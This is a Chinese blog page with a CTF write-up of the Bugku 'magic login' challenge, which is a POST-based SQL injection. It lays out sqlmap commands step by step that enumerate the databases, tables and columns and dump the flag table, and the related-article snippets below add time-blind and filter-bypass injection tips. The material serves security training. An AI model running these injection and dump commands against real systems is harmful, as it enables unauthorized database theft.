bugku 一个神奇的登陆框--POST型SQL注入

最新推荐文章于 2024-09-01 14:22:01 发布
最新推荐文章于 2024-09-01 14:22:01 发布
阅读量809 收藏 3
点赞数 2
分类专栏: CTF 文章标签: bugku SQL注入 ctf 网络安全 writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a1004070060/article/details/94154762
版权

解题链接:http://123.206.87.240:9001/sql/

解题过程:

本题并未给出什么提示,首先考虑到弱口令登录,BP抓包后加载send to intruder,加载字典后爆破无果。然后考虑到之前做的题目,尝试用御剑扫描一下后台,也没发现什么线索,这时才注意到页面的title,原来这道题目与SQL注入相关,考虑到user和pass字段都是通过post方法传递,所以本题应该属于POST型注入,于是开始尝试。ps:本文只记录使用SQLmap的一种方法。

首先把抓到的包导出文件:

使用导出的文件爆出数据库名,成功发现了两个数据库:

sqlmap -r '/root/CTF/SQL.txt' --dbs

根据数据库名爆出表名:

sqlmap -r '/root/CTF/SQL.txt' -D bugkusql1 --tables

继续猜解列名:

sqlmap -r '/root/CTF/SQL.txt' -D bugkusql1 -T flag1 --columns

接下来只需要等待爆出数据即可

sqlmap -r '/root/CTF/SQL.txt' -D bugkusql1 -T flag1 -C 'flag1' --dump

或者

sqlmap -r '/root/CTF/SQL.txt' -D bugkusql1 -T flag1 -C 'flag1' --sql-query "select flag1 from flag1"

 

 

 

Void&Exists
关注
专栏目录
BugKu-SQL注入2
u013622866的博客
05-07 433
题目链接 戳我 简单尝试 首先当然是去试试万能密码了,emmmm,全被过滤了...... 试试弱口令呢? admin admin admin 123456 admin123 admin123 ... ... 然后,竟然还是弱口令.......(admin|admin123),但我岂能就这么放过它,嘿嘿,开始手注 题目给除了一些已经过滤的字符,通过尝试,发现并不...
这是一个神奇登录Bugku-web题 使用sqlmap注入实例)
热门推荐
Risker
03-14 1万+
正在学习sqlmap,拿这个题先入门一下。题目链接:http://120.24.86.145:9001/sql/先看下源代码:是post提交,url明显提示是个sql注入,由于post提交,要sql和burp结合起来使用。首先burp抓包,抓到包后选择存到txt文件中:(随便输入账号密码)我保存到了D盘的1.txt里。然后打开sqlmap,输入指令:sqlmap.py -r "D:\1.txt" ...
bugku 这是一个神奇登录
Superpig的博客
11-19 3346
步骤 1、打开题目链接,是一个登录界面,抓包后传数据进行尝试 2、尝试数据 先尝试admin_name=1&admin_passwd=1&submit=GO+GO+GO 得到Try Again! 尝试admin_name=1'&admin_passwd=1&submit=GO+GO+GO 仍然得到Try Again! ,说明 ’ 被过滤了 尝试admin...
记一次实战中sql注入——一个登录怎么测试?
最新发布
白帽黑客鹏哥的博客
09-01 1579
一个登录怎么测试?测试步骤:1、首先查找注入点:在登录页面的账户输入admin’密码随便输,返回如下图但是我输入admin’’ 密码随便,返回的又不一样所以我先去bp里面抓包试验一下用sleep()函数实验一下,看能不能触发这个sleep函数果然它睡了五秒所以更加确定这个地方是有注入点的那么接下来构造基本的轮子:Payload:在sleep()函数里面加一个if语句,就是说1=1那个表达式中,如果为真就返回5,否则就返回0这一次也是停了5秒才显示出来的继续构造poc。
bugku-这是一个神奇登陆
yangker12148的博客
05-29 550
打开http://123.206.87.240:9001/sql/后是个登陆界面 查看源代码 于是考虑到sql注入,因为是post,所以将burp的抓到的包保存到1.txt中,用sqlmap抓包 命令:sqlmap.py -r 1.txt -p admin_name --dbs//爆数据库名 后续在保表、列以及数据 命令sqlmap.py -r 1.txt -p admin_name -D ...
bugku----这是一个神奇登陆
weixin_43803070的博客
07-07 527
此题是sqlmap+burp结合完成的,打开一看是一个登陆架,url显示sql,想必是postsql注入。 查看注入点: 首先burp抓包,抓到包后选择存到txt文件中:(随便输入账号密码): root@kali:~# sqlmap -r '/root/桌面/2.txt' -p admin_name --dbs// -r是读文件 后面是刚才保存的绝对路径,-p是参数,也就是注入点(选了a...
BugkuCTF 这是一个神奇登陆
3tu6b0rn的博客
05-15 374
post注入 直接跑sqlmap吧 抓包到本地 sqlmap.py -r "C:\Users\联想\Desktop\1.txt" admin_name存在注入点 查数据库 sqlmap.py -r "C:\Users\联想\Desktop\1.txt" --dbs sqlmap.py -r "C:\Users\联想\Desktop\1.txt" -D bugkusql1 --tabl...
bugku 神奇登陆 (kali sqlmap+burpsuite)
xlcvv的博客
03-06 315
例题:bugku 神奇登陆:http://123.206.87.240:9001/sql/ (想到这个题之前也有一题也是sql注入,题目:成绩单:http://123.206.87.240:8002/chengjidan/) F12查看网页代码: 由图中可见,提交方式是POST,随意在输入输入用户名和密码,拿去burpsuite抓包: 抓包结果如下: 就把burpsuite结果另存为t...
BugKu Web(21-25)
kid的博客
06-06 1979
BugKu Web(21-25) 前言 bugku刷题,本来想每10道写一篇的,但水平有限,发现到这里题目难度已经有点大了,所以每5道题整合一篇吧… 题目 秋名山老司机 登陆可以看到如上提示,然后快速刷新可以看到要求是post提交,键名为value 这肯定是人工没法完成的,必须写脚本 py脚本写起来的时候,没有用过eval函数,是真的痛苦,不断字符串处理,条件判断… 最后还不对,最后看...
bugku web方向所有题解
kekefen01的博客
04-18 3210
第一题F12,第二题打开js文件,第三题 get参数 第四题转换成post请求最后空一行加入what=flag 注意最后不能加回车,不然会把what的值认为是"flag\n" 可以转换post加入参数,再转成get再转换成post 第五题php弱类 num=1df 随便什么,反正$num==1都能通过 $num=$_GET['num']; if(!is_numeric($num)) { ech...
CTF|BugkuCTF-WEB解题思路
这里是一处长期不更新的博客
06-15 2047
截止至练习题【login4】,仅提供解题思路。 WEB2 按F12直接可得flag 计算器: 直接按F12,将maxlength修改,输入正确结果即可得到flag web基础$_GET URL输入:http://123.206.87.240:8002/get/?what=flag web基础$_POST 使用hackbar工具,按F12,打开Post data,传递what=flag。 矛盾 这里是使用is_numeric遇到%00截断的漏洞,这里构造 http://120.24.86.145:8002.
Bugku sql注入
m0_63253040的博客
07-26 1159
过滤了length,like,information,and,union,select,order,where等等。得到数据库后面因为fuzz后发现过滤了太多字符,所以这里根据。用括号绕过空格,我们发现能用的字符有,or,'得到数据表admin和字段名password后。先万能密码试试看,是不等于的意思。是用字典跑出数据表和字段,这里先跳过。提示这题布尔盲注,先fuzz一波。可以确定这里有布尔盲注。去登录账号是admin。最后利用脚本爆出数据库。得到密码bugctf。进入环境是个登录页面。...
BugKusql注入
D-R0s1的博客
08-08 920
       今天和大家分享一道BugKu中关于sql注入的题目,在web题中,sql注入的相关知识可以说随处可见了,在这里咱们就就题论题不做其他的拓展和延伸了。        拿到题以后,还是老套路,and 1=1和and 1=2 看看是否带入查询,但是这个题目在?id=1和?id=1'两种条件下都不报错,查看页面源代码发现gb2312于是尝试宽字节注入。?id=1%bf' union sel...
Bugku WEB sql注入
qq_41696858的博客
07-27 618
明显的布尔盲注。md5值和之前的一样,bugkuctf 这题也是过waf题,具体过滤了哪些字符可以用burpsuite跑个字典看看。 然后就是#,substr这两个关键的函数没有进行过滤,那么可以根据这个构造payload,由于空格被过滤了,所以,考虑用()代替空格 把上一题的脚本改改,爆破出密码来,那就可以直接提交得到flag了 import requests #password一般由大小写字母和数字组成 allString = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJK
bugku-web-SQL注入
qq_75121443的博客
04-18 241
这里利用ASCII码对数据库名称进行提取,得到第一个为ASCII码99,得到为字母b。得到=、空格、and、+、,、()等关键字全被过滤。这里稍微测试后,直接得到正确账号名admin。这也太过分了,连逗号都过滤了。,可以使用from(1)解决。以此继续,得到password。空格可以使用or()解决。
sql注入——bugku
weixin_34417814的博客
07-12 228
刚刚做了bugku的题目,现在整理一下 写出解题思路,希望能够帮助到那些需要帮助的人 所有的wp都是以一题一篇的形式写出 主要是为了能够让读者更好的阅读以及查找, 希望你们不要责怪!!共勉!!! 永远爱你们的————新宝宝 Challenge 1345 Solves sql注入 50 http://103.238.2...
bugku--SQL注入((利用脚本))
hxhabcd123的博客
08-28 1794
本文记录利用脚本来解决SQL注入CTF
CTF-web】bugku-成绩查询(sql注入
Sankkl1的博客
08-17 710
再测试,当id为1’时,无数据,而当id为1’#时,又正确返回了数据,推测构造的数据库查询语句可能是类似。查询skctf库中的表的名称,结果其中有一个表名为fl4g,很可能其中就包含了flag。查询fl4g表中的列名,发现其中有一列的名称为skctf_flag。如上图所示,当id为1时返回名字为“龙龙龙”的成绩单。我们要找到能返回能够返回我们需要的信息的位置,当。时,数据不显示,可以知道一列数据有4列。时,我们可以查询到库名,如下图所示。这样的,其中XX为传入的参数。时,可以正常显示,直到。
POST_sql注入
D_Dwjh的博客
08-10 735
POST注入,主要特征是有提交的表单!!! 因为GET和POST最大的区别是,一个参数是在url里面显示,另一个是在body中显示。 所以在弄POST注入的时候,是通过提交表单来实现的!!! 其实POST注入也是那5个规则: 1.首先找到注入点 2.探测页面字段数 3.探测输出点 4.探测数据库名和表名 5.获取字段值 开始~ 靶场POST_rank1练手: 首先打开靶场,先看一下查询语句,发现有2个参数,一个是“username”,另一个是“password”。 看了一下,思考……感觉可以通过闭合引号+
SQL注入工具sqlmap新版本发布 - 安全测试更进一步
资源摘要信息:"sqlmap是一个自动化的SQL注入工具,它是用于发现和利用SQL注入漏洞,评估数据库服务器安全性的开源软件。该工具支持多种数据库管理系统,如MySQL, PostgreSQL, Oracle, Microsoft SQL Server, ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值